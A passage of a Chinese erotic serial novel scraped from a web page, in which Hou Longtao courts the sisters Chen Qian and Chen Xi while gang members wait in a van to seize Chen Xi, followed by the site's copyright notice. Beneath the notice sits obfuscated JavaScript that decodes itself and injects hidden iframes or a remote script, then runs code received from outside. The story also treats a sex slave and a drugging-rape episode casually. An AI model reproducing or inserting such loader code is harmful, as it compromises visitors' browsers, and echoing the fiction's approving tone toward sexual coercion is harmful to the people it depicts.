一点儿意思也没有?”“没有,怎么不合理了?”“你要是因为有男朋友,不答应他还能理解,现在你是自由之身了,怎么会不接受他呢?”“为什么一定要接受?”“施小龙那个小孩儿你都接受了,他总不会比一个纨绔子弟还要差吧?”“你们不知道,他不是好人。”“说说,说说。”“没什么好说的。”虽然陈倩曾经在背地里说过侯龙涛的坏话,但那是关系到自己的妹妹,不说不行,但现在对着的是自己的同事,她没有再一次违背自己做人的原则。“他不像坏人啊,长得挺斯文的,好像还对你一往情深呢。”“知人知面不知心,长相是不能说明问题的。”“哇,他到底干了什么了,让你说出这种话来?”“他…”陈倩突然不说话了,小曦的事儿她是不能说,自己的事儿却是没的说,以前总觉得侯龙涛有很多很多对不起自己的地方,可仔细的想想,自从他回国以来,除了欺骗小曦,好像也没对自己做出什么特别不可原谅的行为,不仅如此,他还救过自己两次。“喂,你怎么了?”一个同事推了推双眉微皱的陈倩,“你到底是不是真的不要他?”“不要。”陈倩还在沉思中,无意识的应了一句。“那…那你介绍我们认识一下儿吧,我看他不错,我都和男朋友分手两个多月了。”“他…他结婚了。”“啊!?原来是这样啊,那他还追你?怪不得你不答应他呢。”“是…是啊。”陈倩都不明白自己为什么会给出那样一个回答,她知道如果光说侯龙涛是有女朋友的,自己这个自以为很出众的同事是不会罢手的,难道说自己不和侯龙涛好,也不希望自己认识的人和他好吗?陈倩真的感到很困惑,以侯龙涛的条件,如果他是真心实意的爱自己,自己未必就不会动心。“唉,想这些干什么,他只是个为了骗女人上床而不择手段的小人。”陈倩摇了摇头,把那个救过她两次的男人的身影从脑子里赶了出去…接下来的四天,陈氏姐妹天天都会收到侯龙涛让人送的二十朵茉莉花儿,但她们从来都是如数退回。终于,二月十四号,一个老外编造的、用来骗钱的“节日”到来了,国贸里花儿店的生意比往年的这个时候要红火许多,他们接了一个大单,1998朵长枝红玫瑰。陈倩下班儿回到家,一进门儿就看到母亲脸上挂着奇怪的笑容,“妈,您怎么了?”“我的女儿就是招人爱。”“您说什么啊?”“还装傻,你刚和施小龙分手,就立刻又有人追你了。”“啊?您…您怎么知道的?”“你回屋看看就知道了。”陈倩赶紧进了自己的房间,一下儿就楞住了,床上、桌上、窗台儿上、地上,摆满了艳红色的玫瑰,陈曦正坐在桌前,双手托着脸蛋儿,望着窗外,不知在想什么,“小曦,这…这是…”“啊!姐,你回来了,”女孩儿转过头来,“这些是涛…那个人送来的,一共一千九百九十八朵,咱们一人九百九十九朵。”“小曦,你…”陈倩把门关上了,“咱们不是说好了不收他的礼物的吗?”“我…我…”女孩儿撅起了小嘴儿,“它们多漂亮啊,我实在是忍不住,而且他一定花了很多钱的,要是再退回去,那…那多浪费啊。”陈倩看得出来妹妹没把什么都说出来,“小曦,你是不是还想着那个人?”“姐,我…我…”陈曦突然抱住了姐姐的身体,“我好想他…”“小曦,你为什么这么死心眼儿呢?”“我…我想他是真的爱我的。”“真的爱你?那花儿他是送给咱们两个人的,他想让咱们俩都跟他好,你愿意跟我分享一个男人?”陈曦低下了头,她不敢跟姐姐说自己的真实想法,要是说出来,一定会被骂的,而且她也不是就那么肯定侯龙涛是真的爱自己,更不肯定自己就一定能接受和别的女人共侍一夫,“那现在怎么办?我都已经收了。”“唉,这可往哪儿放啊。”陈倩从桌上拿起了一枝玫瑰,轻轻的摸了摸柔软的花瓣儿…这一天侯龙涛可是大忙人,其实他之所以要在情人节前和陈曦闹僵,就是怕今天会忙不过来。中午和任婧瑶一起吃的午饭,然后又小搞了她一下儿,虽然她只是一个性奴,但毕竟是漂亮女人,偶尔还是要哄哄的。到了晚上,和五个老婆共进了浪漫晚餐,之后当然就是再次上演“五凤迎龙”的好戏。本来侯龙涛是想在12:00的时候给张玉倩打电话的,结果女孩儿在那之前就打电话过来了,幸好他增经对五个老婆“坦白”过张玉倩的存在,当然是把“空中迷j”那段儿省了。尽管如此,他还是费了很大的劲儿才把吃乾醋的薛诺哄得又开心了…二月十五号,“东星集团”的汽车尾气净化器正式上市了,因为还没到市委规定经媒体正式出台的日子,整整三天,十五家专卖店只卖出了不到一百套,侯龙涛也只能无奈的感叹国人的环保意识还不是很强。为了今后公司的发展,“东星集团”的总部设在了光大大厦的第十五层,田东华很少去易庄的工厂,只是在高级的办公室里连络外地销售的事宜。不过他倒是也干了点儿实事儿,一些收到了市委通知的政府机关想要压低购买的价格,他都视对方的来头儿,做出最小限度的让步。田东华这一段的工作还真是挺让侯龙涛满意的,所以他也基本上不去“光大”,两人形成了井水不犯河水之势。另外还有一件值得注意的事儿,侯龙涛的工厂的规模不算大,但却从一家刚刚成立的保安公司雇用了100名保安,其中有80多人都是退伍军人,那家保安公司的法人叫刘宏达…“c,都他妈守了三天半了,连他妈人影儿都没见着,这得等到哪辈子去啊?”“你他妈哪儿来的这么多废话啊,老大让咱们在这儿等着,咱们就得等着,出牌,出牌。”四个男人正在一辆半封闭式的“金杯”面包车的后箱里打着扑克。“嗨,别玩儿了,快过来看看是不是她。”坐在前面的司机用略带兴奋的声音说,指了指一个刚从不远处小区的大门里走出来的女人。“我看看,我看看,”后座儿上的一个人赶忙掏出了一张照片对比了一下儿,然后就坐到了司机旁边的座位上,“没错,就是她,动手吧。”陈曦在家里憋了好几天,老是胡思乱想,侯龙涛虽然天天都让人送花儿来,但却一直也没再露面儿或是打电话来。这天女孩儿实在是忍不住了,就给家人留了张字条,说
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}